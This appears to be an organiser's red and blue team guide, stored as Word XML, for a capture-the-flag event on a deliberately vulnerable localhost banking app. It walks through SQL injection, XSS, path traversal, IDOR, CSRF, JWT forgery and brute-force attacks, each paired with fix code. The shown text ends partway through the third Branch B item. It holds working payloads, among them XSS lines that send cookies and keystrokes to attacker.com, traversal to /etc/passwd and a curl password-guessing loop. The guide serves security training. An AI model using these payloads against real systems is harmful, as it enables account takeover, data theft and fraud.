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A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0" w:after="1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🏦 NexusBank</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after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62E"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">CTF Security Challenge</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40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CCDD"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Three Branches — 24 Vulnerabilities</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:color="B8962E" w:sz="6" w:space="1"/>
              </w:pBd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3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0" w:after="1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C96A"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">Red Team &amp; Blue Team Complete Guide</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40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BCC"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Detailed Step-by-Step Instructions for All Vulnerabilities</w:t>
            </w:r>
          </w:p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AAB"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Branch A — Andheri  ·  Branch B — Bandra  ·  Branch C — Colaba</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after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Event Format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Minutes — All branches simultaneous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Total Vulns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(8 per branch) — All unique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Beginner (V1–V4) → Intermediate (V5–V8)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Red Team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Exploit vulnerabilities, capture data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Blue Team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Identify, patch, and defend each vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1C2E4A" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C2E4A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">📋 Quick Reference — All 24 Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after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All vulnerabilities across the 3 NexusBank branches. Sorted by branch and difficulty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2200"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="5160"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:left w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:right w:val="single" w:color="1C2E4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1C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400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:left w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:right w:val="single" w:color="1C2E4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1C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V#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:left w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:right w:val="single" w:color="1C2E4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1C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000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:left w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:right w:val="single" w:color="1C2E4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1C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160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:left w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1C2E4A" w:sz="1"/>
              <w:right w:val="single" w:color="1C2E4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1C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Quick Attack Vector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Sensitive Data in HTML Source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page source, find admin creds in comment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IDOR — Account Access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 ACC002 → ACC001 in URL to get admin data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Broken Auth — Weak Passwords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as any user with guessable password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Sensitive Data API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/api/all-accounts — no auth, full DB dump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 Injection — Login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admin' OR '1'='1' -- in username field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Stored XSS — Feedback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&lt;script&gt;alert(1)&lt;/script&gt; in feedback form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Directory Traversal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../../secret.txt in statement download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CSRF — Fund Transfer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token; cross-origin POST transfers money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361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Weak Secret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Secret="secret"; forge admin JWT at jwt.io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361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IDOR — Transactions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 BAC001 in URL to see any txn history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361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Broken Auth — No Lockout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Brute force login — no rate limiting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361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PUT /api/profile with role=admin in body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361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 Injection — Search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 OR '1'='1 in search dumps all accounts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361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Reflected XSS — Search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&lt;img src=x onerror=alert(1)&gt; in search query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361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Insecure File Access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/api/docs/internal_audit.txt — no check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361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Broken Access Control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Forge JWT role=admin → access /api/admin/users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3B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Cookie Manipulation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Decode base64 cookie, change role/balance, re-encode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3B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IDOR — Loan Details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/api/loan/4 reveals admin loan (₹9,99,999)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3B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Credentials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with admin / admin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3B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Enumeration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/api/ticket/1, /2, /3 — other users tickets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3B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 Injection — Profile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', nominee='HACKED' WHERE 1=1 --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3B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DOM-Based XSS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&lt;img src=x onerror=alert(1)&gt; in profile field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3B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 Traversal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../server_config.txt in document download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3B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CSRF — Profile Update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CSRF token — POST /api/profile/nominee</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1C2E4A" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C2E4A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴 / 🔵 Detailed Attack &amp; Defence Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after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Each vulnerability below includes: what the vulnerability is, step-by-step Red Team attack instructions, step-by-step Blue Team defence/patch, and real-world impact.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A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="180"/>
              <w:left w:type="dxa" w:w="300"/>
              <w:bottom w:type="dxa" w:w="180"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar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Branch A — Andheri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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Port 5001  ·  8 Vulnerabilities  ·  Beginner → Intermediate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VA1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Sensitive Data in HTML Source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A — Andheri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Developers sometimes leave credentials, API keys, or TODO notes in HTML comments. These comments are invisible on screen but fully visible in page source — anyone can read them without logging in.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Open the Branch A login page in browser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http://localhost:5001 in your browser.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NOT login yet — we need to inspect the page source before anything.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View the HTML page source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Right-click anywhere on the page → click "View Page Source"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press Ctrl+U (Windows/Linux) or Cmd+U (Mac).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new tab opens with all the raw HTML code of the login page.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Search for hidden credentials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Press Ctrl+F in the source view to open search.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for: admin OR password OR TODO OR DEV NOTE.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will find this HTML comment near the top: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&lt;!-- DEV NOTE: Staging creds — admin/admin123 | DO NOT COMMIT --&gt;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4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Use found credentials to login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back to http://localhost:5001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Username: admin  |  Password: admin123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are now logged in as the admin account with balance ₹9,99,999!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Successfully login as admin with found credentials. See account balance: ₹9,99,999 and admin account number ACC001.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Find the sensitive comment in app.py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branch-a/app.py in a code editor.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(Ctrl+F) for "DEV NOTE" or "admin123".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will find the HTML comment inside the HTML variable near the &lt;title&gt; tag.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Remove the comment from the HTML template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this entire line from the HTML string in app.py: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&lt;!-- DEV NOTE: Staging creds — admin/admin123 | DO NOT COMMIT --&gt;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BEFORE (vulnerable):
# &lt;!-- DEV NOTE: Staging creds — admin/admin123 | DO NOT COMMIT --&gt;
# AFTER (fixed):
# [Line deleted — no credentials in HTML]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Apply same fix to all environment configs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entire codebase for hardcoded passwords: grep -r "admin123" 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or move credentials to environment variables or .env files.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store real credentials in source code or HTML comments.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 real world: admin credentials in source code = complete system compromise. Attackers scrape GitHub, use Google dorks, or check source on every page they visit.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VA2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IDOR — Account Access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A — Andheri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IDOR (Insecure Direct Object Reference) occurs when an application uses user-supplied input to access objects directly without checking if the user has permission. Here, account numbers are sequential and guessable.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Login with a regular user account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http://localhost:5001 and login.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Use: alice / password  (or bob / bob123)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login, go to Account page — you see your own account ACC002.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Notice the account number in the URL/input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the Account page, the input box shows your account: ACC002.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API call being made is: GET /api/account/ACC002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account number is directly used as a parameter — it is not verified against your session!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Change the account number to access other accounts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account input box, type: ACC001 and click Fetch.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directly call: http://localhost:5001/api/account/ACC001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 all: ACC001, ACC002, ACC003, ACC004, ACC005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4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Capture sensitive data from all accounts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can now see: Full name, Email, Phone, Balance, PAN Number, IFSC, Password Hash.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ACC001 = Admin account — balance ₹9,99,999 and PAN ABCDE1234F.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 all exposed PAN numbers and password hashes — these can be cracked offline.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Access ACC001 (admin) data while logged in as alice. Capture PAN number: ABCDE1234F and password hash.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Identify the vulnerable API route in app.py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branch-a/app.py and find the /api/account/&lt;acc&gt; route.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current code fetches account by acc without checking if it belongs to the logged-in user.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VULNERABLE CODE (current):
@app.route("/api/account/&lt;acc&gt;")
def account(acc):
    if "user_id" not in session: return 401
    db = get_db()
    # BUG: no ownership check!
    user = db.execute("SELECT * FROM users WHERE account_no=?", (acc,))
    return jsonify(dict(user))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ownership check to the route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Modify the route to verify the requested account belongs to the logged-in user.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allow access if acc == session["account_no"] OR user is admin.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 CODE:
@app.route("/api/account/&lt;acc&gt;")
def account(acc):
    if "user_id" not in session: return 401
    # Only allow own account (or admin)
    if acc != session["account_no"]:
        return jsonify({"error": "Access denied"}), 403
    db = get_db()
    user = db.execute("SELECT * FROM users WHERE account_no=?", (acc,))
    return jsonify(dict(user))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Also limit sensitive fields in response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 for own account, do not return password hash in API response.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SELECT to pick only needed columns: id, account_no, full_name, email, balance, phone.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include password, PAN, or other sensitive fields in general API responses.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customer account exposed. In banking: financial fraud, identity theft, regulatory penalties (RBI, GDPR). IDOR is consistently in OWASP Top 10.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VA3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Broken Auth — Weak Passwords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A — Andheri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Broken Authentication includes weak passwords, no account lockout, and poor credential management. Applications with predictable or default passwords are trivially compromised.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Notice the demo credentials on login page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login page shows demo accounts: alice/password, bob/bob123, charlie/charlie.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These are extremely weak passwords — "password", "bob123", "charlie" are in every wordlist.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Try common passwords for the admin account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Username: admin — try these passwords one by one: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admin, admin123, password, nexusbank, 123456, Admin@123, nexus123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Manual test in browser:
# Username: admin
# Try passwords: admin, admin123, password, nexus@123
# OR test via curl:
curl -X POST http://localhost:5001/api/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":"admin123"}'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Confirm successful login with admin credentials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/ admin123 works — confirmed by the HTML source from V1.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now have full admin access.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Note: No lockout after wrong attempts — you can try unlimited passwords.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Successfully login as admin with admin/admin123. No lockout occurred during brute force attempts.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Enforce strong password policy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password validation in the registration/setup logic.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10 characters, must include: uppercase, lowercase, number, special character.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Reject passwords from common password lists (rockyou.txt etc.).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Implement account lockout after failed attempts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failed login count per username in the database.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5 failed attempts: lock account for 15 minutes.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 generic error "Invalid credentials" — never say "wrong password" (leaks username validity).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Add to login route:
failed = db.execute("SELECT failed_attempts FROM users WHERE username=?", (username,)).fetchone()
if failed and failed["failed_attempts"] &gt;= 5:
    return jsonify({"error": "Account locked. Try after 15 minutes."}), 429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Change all default/weak passwords immediately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admin password to something like: Nx$3cur1ty#2025!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Force password change on first login for all demo accounts.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ship any application with default or demo credentials.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Credential stuffing attacks use automated tools to try millions of username/password combinations. Without lockout, an attacker can try 1000s of passwords per second.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VA4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Sensitive Data API — No Authentication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A — Andheri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APIs that return sensitive data without requiring authentication are critical vulnerabilities. Any tool (curl, Postman, browser) can access this data without a username or password.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Find the unauthenticated API endpoint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the API Explorer tab in Branch A (after login).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directly open in browser (no login needed!): http://localhost:5001/api/all-accounts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Call the endpoint and see full database dump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"GET /api/all-accounts" button OR visit the URL directly.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receive ALL user records including: passwords (MD5 hashes), PAN numbers, balances, phone numbers, emails.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Direct API call — no cookie/token needed:
curl http://localhost:5001/api/all-accounts
# Response includes:
# {"id":1,"account_no":"ACC001","username":"admin",
#  "password":"0192023a7bbd73250516f069df18b500","pan":"ABCDE1234F",...}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Crack the MD5 password hashes offline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Copy any password hash from the response e.g.: 5f4dcc3b5aa765d61d8327deb882cf99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https://crackstation.net and paste the hash.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Result: 5f4dcc3b5aa765d61d8327deb882cf99 → "password" (alice's password!)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Access full database dump without login. Collect all PAN numbers and crack at least one password hash using CrackStation.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authentication check to /api/all-accounts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app.py and find the all_accounts() function.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session check at the top — at minimum require login.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Better: restrict to admin role only.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FIXED:
@app.route("/api/all-accounts")
def all_accounts():
    if "user_id" not in session:
        return jsonify({"error": "Not authenticated"}), 401
    if session.get("role") != "admin":
        return jsonify({"error": "Admin only"}), 403
    # ... rest of function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Remove or hash sensitive fields from response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include password hashes in API responses — even for admin.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Exclude PAN, password from all account listing APIs.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a whitelist of safe fields to return.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Only return safe fields:
safe_fields = ["id","account_no","full_name","email","phone","balance"]
return jsonify([{k:dict(u)[k] for k in safe_fields} for u in users])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Switch from MD5 to bcrypt for password hashing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MD5 is broken — it can be cracked in milliseconds using rainbow tables.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bcrypt, argon2, or scrypt instead.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 install bcrypt — then use bcrypt.hashpw() and bcrypt.checkpw().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Complete data breach — all customer PII, financial data, and credential hashes exposed. Violates RBI data localisation rules, GDPR, and IT Act 2000. Company liable for crores in fines.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VA5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SQL Injection — Login Bypass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A — Andheri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Injection occurs when user input is embedded directly into SQL queries. An attacker can modify the query logic to bypass authentication, extract data, modify records, or drop tables.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Understand how the login works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login form sends username and password to /api/login.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server builds this SQL query: SELECT * FROM users WHERE username='INPUT' AND password='HASH'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the query returns a row, login succeeds. We will manipulate the SQL to always return a row.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Enter SQLi payload in username field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username field, type exactly: admin' OR '1'='1' --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Leave password as anything (e.g. xyz).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Sign In.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Username: admin' OR '1'='1' --
Password: anything
# Resulting SQL query becomes:
# SELECT * FROM users WHERE username='admin' OR '1'='1' --' AND password='...'
# The -- comments out the password check!
# '1'='1' is always TRUE → query returns admin row → login succeeds!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Observe the SQL error to extract information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Try: ' in username — you'll get a SQL error in the response.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error reveals: unrecognized token: "'Ujdjs7...'" — this confirms SQL injection is possible.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 messages expose the SQL query structure and database type.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4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Escalate — extract other tables via UNION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 in username: ' UNION SELECT 1,2,3,4,5,6,7,8,9 --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columns until no error (9 columns in users table).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can now extract data from any table using UNION SELECT.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Full database dump via SQLi:
Username: ' UNION SELECT id,account_no,username,password,full_name,email,balance,phone,pan FROM users --
Password: x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Login as admin without knowing the password using: admin' OR '1'='1' --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Replace string concatenation with parameterised queries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 the login route in app.py — the query uses f-string (string concatenation).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build SQL queries by concatenating user input.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? placeholders and pass values separately.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VULNERABLE:
query = f"SELECT * FROM users WHERE username='{username}' AND password='{hashed}'"
# FIXED (parameterised query):
query = "SELECT * FROM users WHERE username=? AND password=?"
user = db.execute(query, (username, hashed)).fetchone()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Remove SQL error details from API response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except block currently returns the full SQL error message.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it to return a generic message instead.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VULNERABLE:
except Exception as e:
    return jsonify({"error": str(e)}), 400  # exposes SQL!
# FIXED:
except Exception:
    return jsonify({"error": "Login failed"}), 400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Apply parameterised queries to ALL routes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app.py for all f-string SQL queries: grep -n "f\"SELECT" app.py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every single one — not just login.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an ORM (SQLAlchemy) to avoid manual SQL entirely.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SQLi is the #1 web vulnerability for 15+ years. Complete database takeover possible. Attacker can read, modify, delete all data. In 2023, multiple Indian banks lost crores due to SQLi attacks.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VA6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Stored XSS — Feedback Form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A — Andheri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Stored XSS (Persistent XSS) stores malicious JavaScript in the database. When other users view the page, the script executes in their browser — allowing session hijacking, phishing, and keylogging.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Go to the Feedback page and understand how it works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and navigate to the Feedback tab.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form lets you submit feedback that is stored in the database.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submitted feedback is displayed to all logged-in users — this is the attack surface.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Submit a basic XSS payload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feedback message box, type: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&lt;script&gt;alert("XSS by Red Team!")&lt;/script&gt;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Submit.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Trigger the stored XSS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"Refresh" to load all feedback.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script tag is rendered as HTML — a popup appears: "XSS by Red Team!"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user who loads feedback will now trigger this script — it's stored in the DB!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More impactful XSS payloads:
# Steal cookies (session hijacking):
&lt;script&gt;document.location="http://attacker.com/steal?c="+document.cookie&lt;/script&gt;
# Keylogger:
&lt;script&gt;document.onkeypress=function(e){new Image().src="http://attacker.com/key?k="+e.key}&lt;/script&gt;
# Phishing redirect:
&lt;script&gt;document.location="http://fake-nexusbank.com/login"&lt;/script&gt;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4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Demonstrate real impact — cookie theft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Submit: &lt;script&gt;alert(document.cookie)&lt;/script&gt;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Refresh feedback — a popup shows your session cookie.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attacker can send this cookie to their server and hijack your session!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Submit &lt;script&gt;alert(document.cookie)&lt;/script&gt; in feedback. See session cookie popup when feedback loads for any user.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Sanitise output when rendering feedback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vulnerability is in JavaScript: innerHTML renders HTML tags.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innerHTML to textContent to treat everything as plain text.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VULNERABLE (in HTML):
el.innerHTML = feedback.message  // renders &lt;script&gt; as HTML!
// FIXED:
el.textContent = feedback.message  // renders as plain text, no execution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input sanitisation before storing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app.py feedback POST route, sanitise the message before storing.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HTML entity encoding to neutralise dangerous characters.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In Python, sanitise before storing:
import html
# In feedback POST route:
msg = request.get_json().get("message", "")
clean_msg = html.escape(msg)  # converts &lt; to &amp;lt;, &gt; to &amp;gt; etc.
db.execute("INSERT INTO feedback (username,message) VALUES (?,?)", (session["username"], clean_msg))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Content Security Policy header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a CSP header to prevent inline scripts from running.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a defence-in-depth measure.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Add to Flask app:
@app.after_request
def add_security_headers(response):
    response.headers["Content-Security-Policy"] = "default-src 'self'; script-src 'self'"
    response.headers["X-XSS-Protection"] = "1; mode=block"
    return response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 hijacking = attacker can impersonate any victim user. Used in real attacks against Facebook, Yahoo, eBay. Can lead to complete account takeover for all users who view the page.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VA7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Directory Traversal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A — Andheri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Directory Traversal (Path Traversal) uses ../ sequences to navigate outside the intended directory. An attacker can read any file the web server process has permission to access.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Understand the statement download feature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Statements tab in Branch A.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usage: enter "ACC002_jan25.txt" → server returns file from /statements/ folder.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API is: GET /api/statement?file=FILENAME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file parameter is passed directly to os.path.join() without sanitisation!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Navigate outside the statements directory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file input, enter: ../../secret.txt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Fetch.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server resolves: /branch-a/statements/../../secret.txt = /branch-a/secret.txt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Path traversal payloads:
../../secret.txt          → reads /branch-a/secret.txt
../../../etc/passwd       → reads /etc/passwd (Linux user list)
../../app.py              → reads the entire server source code!
../../../proc/version     → reveals OS kernel version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Read the secret configuration file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Enter: ../../secret.txt and click Fetch.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see: ADMIN_PASS=admin123, DB_PATH, SECRET_KEY, BACKUP_IP.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file should never be accessible from outside the application!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4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Read the Flask app source code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Enter: ../../app.py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can read the entire server-side code — all routes, all SQL queries, all logic.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gives complete knowledge of every other vulnerability in the system.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 /branch-a/secret.txt containing ADMIN_PASS=admin123 and SECRET_KEY. Bonus: read /etc/passwd.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Sanitise the file path to prevent traversal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app.py statement() function, validate that the resulting path stays inside STMT directory.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os.path.realpath() to resolve the actual path, then check it starts with STMT.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 CODE:
@app.route("/api/statement")
def statement():
    if "user_id" not in session: return 401
    fname = request.args.get("file", "")
    # Sanitise: remove ../ sequences
    fname = os.path.basename(fname)  # strips any directory components
    path  = os.path.join(STMT, fname)
    # Double-check: ensure path is inside STMT
    if not os.path.realpath(path).startswith(os.path.realpath(STMT)):
        return jsonify({"error": "Access denied"}), 403
    try:
        return jsonify({"content": open(path).read()})
    except:
        return jsonify({"error": "File not found"}), 404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Restrict file access to account owner only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Additionally check that the requested file belongs to the logged-in user.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Filenames should follow a pattern like: {account_no}_*.txt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the account_no prefix matches the session user.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Extra check — file must start with user's account number:
acc = session["account_no"]
if not fname.startswith(acc):
    return jsonify({"error": "You can only access your own statements"}), 403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Move sensitive files outside the web root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Move secret.txt and app.py to a directory that the web server cannot read.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Configuration and secrets should use environment variables, not flat files.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Attackers can read: source code, config files, private keys, /etc/passwd, database files. Led to major breaches at Capital One (2019) and countless others. Can escalate to Remote Code Execution.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VA8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CSRF — Fund Transfer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A — Andheri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CSRF tricks a logged-in user's browser into sending a malicious request to the bank. Since the browser automatically includes session cookies, the bank executes the request thinking it is legitimate.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Understand CSRF — cross-site request forgery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you are logged in, your browser sends your session cookie with every request to that site.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another website makes a POST request to Bank A, the browser still sends your cookie!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bank cannot tell if the request came from you or from a malicious site.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Stay logged in to Branch A and open a "malicious" page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 Branch A logged in (http://localhost:5001).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a NEW tab and simulate an attacker page by opening browser console (F12).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attacker page will make a silent POST to the bank transfer endpoint.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Paste this in browser console (simulates attacker site):
fetch("http://localhost:5001/api/transfer", {
  method: "POST",
  headers: {"Content-Type": "application/json"},
  credentials: "include",  // sends your session cookie!
  body: JSON.stringify({
    to_account: "ACC001",  // admin account
    amount: 5000,
    note: "CSRF attack"
  })
}).then(r=&gt;r.json()).then(console.log)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Confirm the transfer was made without user interaction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back to Branch A → Dashboard → check transactions.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will see: ₹5,000 transferred to ACC001 — victim initiated this without knowing!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attack works because: no CSRF token, CORS allows credentials, no origin validation.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Successfully transfer ₹5,000 from victim account to ACC001 using CSRF in browser console, without victim clicking any button on the bank site.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Implement CSRF token generation and validation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a unique random token per session. Include it in every form and API call.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Validate the token server-side before processing any state-changing request (POST/PUT/DELETE).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In app.py — generate token on login:
import secrets
session["csrf_token"] = secrets.token_hex(32)
# In transfer route — validate token:
@app.route("/api/transfer", methods=["POST"])
def transfer():
    if "user_id" not in session: return 401
    d = request.get_json()
    # Validate CSRF token:
    if d.get("csrf_token") != session.get("csrf_token"):
        return jsonify({"error": "Invalid CSRF token"}), 403
    # ... rest of transfer logic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SameSite cookie attribute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 session cookie with SameSite=Strict or SameSite=Lax.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prevents cross-site requests from including the cookie automatically.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In Flask config:
app.config["SESSION_COOKIE_SAMESITE"] = "Strict"
app.config["SESSION_COOKIE_SECURE"] = True  # HTTPS only
app.config["SESSION_COOKIE_HTTPONLY"] = True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Validate the Origin and Referer headers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that POST requests come from your own domain.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Reject any requests where Origin/Referer does not match your server URL.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Used in real banking attacks worldwide. Victim loses money without any action. Can also be used to: change passwords, email, add admin users. One of the oldest web vulnerabilities (OWASP Top 10 for years).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361" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="180"/>
              <w:left w:type="dxa" w:w="300"/>
              <w:bottom w:type="dxa" w:w="180"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar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Branch B — Bandra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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Port 5002  ·  8 Vulnerabilities  ·  Beginner → Intermediate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VB1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JWT Weak Secret — Token Forgery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B — Bandra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 (JSON Web Token) uses HMAC-SHA256 to sign the payload. If the secret key is weak ("secret", "password", "123456"), attackers can forge tokens with any claims they want — including admin role.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Login as a regular user and find the JWT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http://localhost:5002 and login with: priya / priya123.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DevTools → Application → Cookies → Look for cookie: token_b.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Copy the entire JWT value — it looks like: eyJhbGc.... (three parts separated by dots).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Decode the JWT to see its contents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https://jwt.io in a new tab.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Paste your JWT token in the "Encoded" box on the left.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the right you see the decoded PAYLOAD: {"id":2, "username":"priya", "role":"customer"}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JWT Structure (3 parts separated by . ):
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9  ← Header (base64)
.eyJpZCI6MiwidXNlcm5hbWUiOiJwcml5YSIsInJvbGUiOiJjdXN0b21lciJ9  ← Payload
.SIG  ← Signature
# Decoded payload:
{"id": 2, "username": "priya", "role": "customer"}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Modify the payload and forge a new token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jwt.io, in the PAYLOAD section, change "role":"customer" to "role":"admin".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VERIFY SIGNATURE section (bottom), enter the secret: secret.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new signed token appears on the left — copy it!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Modified payload:
{"id": 2, "username": "priya", "role": "admin"}
# Sign with secret: secret
# Copy the new token from the left side of jwt.io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4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Replace your browser cookie and access admin routes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DevTools → Application → Cookies → Double-click token_b value → Paste forged token → Press Enter.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Admin Panel tab → Click "Load All Users".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now have admin access — all users and loans visible!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Forge a JWT with role=admin using secret "secret". Access /api/admin/users and dump all user records.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Change JWT secret to a strong random key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app.py, change: JWT_SECRET = "secret" to a strong secret.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a proper secret: python3 -c "import secrets; print(secrets.token_hex(32))"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 the secret in an environment variable, never in code.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VULNERABLE:
JWT_SECRET = "secret"  # trivially brute-forced!
# FIXED:
import os
JWT_SECRET = os.environ.get("JWT_SECRET")  # from environment
# Generate: export JWT_SECRET=$(python3 -c "import secrets; print(secrets.token_hex(32))")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Validate role claim against the database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 with a valid JWT, verify the role against the actual database on each request.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JWT should be proof of identity, not proof of privilege.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 — admin_users route:
@app.route("/api/admin/users")
def admin_users():
    s = get_session()
    if not s: return 401
    # Verify against DB, not JWT claim:
    db = get_db()
    user = db.execute("SELECT role FROM users WHERE id=?", (s["id"],)).fetchone()
    if not user or user["role"] != "admin":
        return jsonify({"error": "Forbidden"}), 403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Set JWT expiration time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"exp" (expiration) claim to every JWT.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Short-lived tokens limit damage window even if a token is stolen.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Add expiry to JWT payload:
import time
payload = {
    "id": user["id"], "username": user["username"], "role": user["role"],
    "exp": int(time.time()) + 3600  # expires in 1 hour
}
# Verify expiry in verify_jwt():
if payload.get("exp", 0) &lt; time.time():
    return None  # expired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 weak secrets affect thousands of applications. In 2022, multiple DeFi platforms were hacked via JWT forgery. Tools like hashcat can crack weak JWT secrets in seconds.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VB2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IDOR — Transaction History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B — Bandra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Same as A-V2 but for transaction history. The server uses the account number from the URL without checking if it matches the authenticated user's account.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Login and view your own transactions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as priya / priya123.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Transactions tab — you see priya's (BAC002) transactions.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Notice: the URL/API call is GET /api/transactions/BAC002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Change account number to view others' transactions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the Transactions page, click the BAC001 button (admin account).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manually type BAC001 and click Fetch.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now see admin's complete transaction history without any restriction.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Direct API call to any account:
curl -b "token_b=YOUR_JWT" http://localhost:5002/api/transactions/BAC001
curl -b "token_b=YOUR_JWT" http://localhost:5002/api/transactions/BAC003
curl -b "token_b=YOUR_JWT" http://localhost:5002/api/transactions/BAC004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Document all transaction data from all accounts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Enumerate BAC001 through BAC005.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 all transaction amounts, dates, notes — financial surveillance of all customers!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TXN003: BAC001 → BAC002, ₹5,000, note "Bonus" — admin's secret transaction revealed.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View BAC001 (admin) complete transaction history while logged in as priya (BAC002). Find the "Bonus" transaction.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ownership check in transactions route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app.py, find the transactions(acc) function.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that the requested account belongs to the logged-in user (or user is admin).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FIXED:
@app.route("/api/transactions/&lt;acc&gt;")
def transactions(acc):
    s = get_session()
    if not s: return 401
    # Ownership check:
    if acc != s["account_no"] and s.get("role") != "admin":
        return jsonify({"error": "Access denied"}), 403
    db = get_db()
    txns = db.execute("SELECT * FROM transactions WHERE from_acc=? OR to_acc=? ORDER BY ts DESC", (acc,acc)).fetchall()
    return jsonify([dict(t) for t in txns])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financial surveillance of all customers. Violates banking secrecy laws and privacy regulations.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VB3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Broken Auth — No Account Lockout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B — Bandra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Without account lockout, attackers can try thousands of passwords automatically. Combined with weak passwords (V3 from Branch A), this makes brute force attacks trivially successful.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Verify there is no lockout by trying multiple wrong passwords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 logging in as admin with wrong password: wrongpass1, wrongpass2, wrongpass3...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lockout, no captcha, no delay — you can try as many times as you want!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means automated brute force is possible.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Automated brute force with curl:
for pass in admin123 password nexus2024 Admin@123 bank@123; do
  curl -s -X POST http://localhost:5002/api/login \
    -H "Content-Type: application/json" \
    -d "{"username":"admin","password":"$pass"}" | python3 -c "import sys,json; d=json.load(sys.stdin); print(f'$pass → {d}')" 
done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Find the correct password through brute force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correct admin credentials for Branch B: admin / admin@bandra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a real scenario, attackers use wordlists like rockyou.txt with 14 million passwords.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lockout, a fast machine can try 1000+ passwords per second.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Successfully login as admin by brute forcing. Document: no lockout occurs after 10+ failed attempts.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failed attempt tracking to database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columns to users table: failed_attempts INTEGER DEFAULT 0, locked_until DATETIME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Add to init_db():
db.execute("ALTER TABLE users ADD COLUMN failed_attempts INTEGER DEFAULT 0")
db.execute("ALTER TABLE users ADD COLUMN locked_until DATETIME")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Check and update lockout in login route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verifying password, check if account is locked.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failed attempt, increment counter. After 5 fails, lock for 15 minutes.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In login route, add:
import datetime
user_row = db.execute("SELECT * FROM users WHERE username=?", (username,)).fetchone()
if user_row:
    if user_row["locked_until"] and user_row["locked_until"] &gt; datetime.datetime.now().isoformat():
        return jsonify({"error": "Account locked. Try after 15 minutes."}), 429
    if user_row["failed_attempts"] &gt;= 5:
        lock_time = (datetime.datetime.now() + datetime.timedelta(minutes=15)).isoformat()
        db.execute("UPDATE users SET locked_until=? WHERE username=?", (lock_time, username))
        db.commit()
